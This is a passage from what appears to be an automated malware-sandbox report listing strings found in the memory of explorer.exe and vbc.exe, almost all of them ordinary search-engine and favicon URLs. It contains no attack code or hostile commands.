          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2155249221.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
